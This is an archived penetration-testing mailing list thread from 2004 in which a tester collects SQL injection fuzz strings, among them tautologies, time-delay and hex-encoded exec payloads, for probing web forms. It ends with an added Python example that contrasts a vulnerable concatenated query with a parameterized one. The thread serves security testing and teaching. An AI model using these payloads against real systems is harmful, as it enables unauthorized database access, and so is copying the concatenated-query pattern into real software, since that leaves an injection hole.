Penetration Testing mailing list archives
Re: SQL Injection Strings
From: "Marcus" <x-ray () twlc net>
Date: Mon, 28 Jun 2004 03:08:39 -0300
I know one that works.

' or '1 ' or ' 1

Marcus

----- Original Message -----
From: Jeremy Junginger <jj () act com>
To: <pen-test () securityfocus com>
Sent: Friday, June 25, 2004 12:01 PM
Subject: SQL Injection Strings

Good Morning,

I'm customizing an http proxy that's feeding some POST parameters into web forms to test for SQL injections. I figured this would be the group to help put together a comprehensive list of "fuzz strings" to feed into the forms to test them. Here's what I have so far. I know it's far from complete. Please add any additional strings that you think may be helpful, or perhaps a link to an archived thread that has already discussed this?!?:

'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
a" or 1=1--
a" or "a" = "a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000
declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s)

And if you're feeling even more generous, perhaps you have some suggestions on checking the response. I'm doing a regex search for the following to determine interesting strings. Of course I still have to take a look at some of the 200 responses to see if the waitfor and version commands worked :)

HTTP/[0-9].[0-9] 500
[Ee]rror
(My)?SQL

Thanks guys!

-Jeremy
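Added example, not part of the original thread: two of the strings from the list above run against a string-concatenated query and against its parameterized form, to show the two signals the test looks for (a SQL error, or a changed result set) and how parameter binding removes both. The in-memory SQLite database, the users table and the function names are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample data; table and column names are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn

def lookup_concat(conn, name):
    # Vulnerable pattern: the parameter becomes part of the SQL text.
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_param(conn, name):
    # Hardened form: the parameter is bound as data and never parsed as SQL.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

def probe(lookup, conn, value):
    """Return ('error', None) on a SQL error, else ('rows', count)."""
    try:
        return ("rows", len(lookup(conn, value)))
    except sqlite3.Error:
        # In a web app this is what surfaces as the 500 / "error" response.
        return ("error", None)

# A benign control value plus two strings taken from the list in the message.
SAMPLES = ["alice", "'sqlvuln", "a' or 'a' = 'a"]

def run():
    conn = make_db()
    return {s: (probe(lookup_concat, conn, s), probe(lookup_param, conn, s))
            for s in SAMPLES}

if __name__ == "__main__":
    for value, (concat, param) in run().items():
        print(f"{value!r:20} concatenated={concat} parameterized={param}")
```

With the concatenated query the unbalanced quote produces a SQL error and the tautology returns every row; with the bound parameter both strings are treated as an ordinary name that matches nothing.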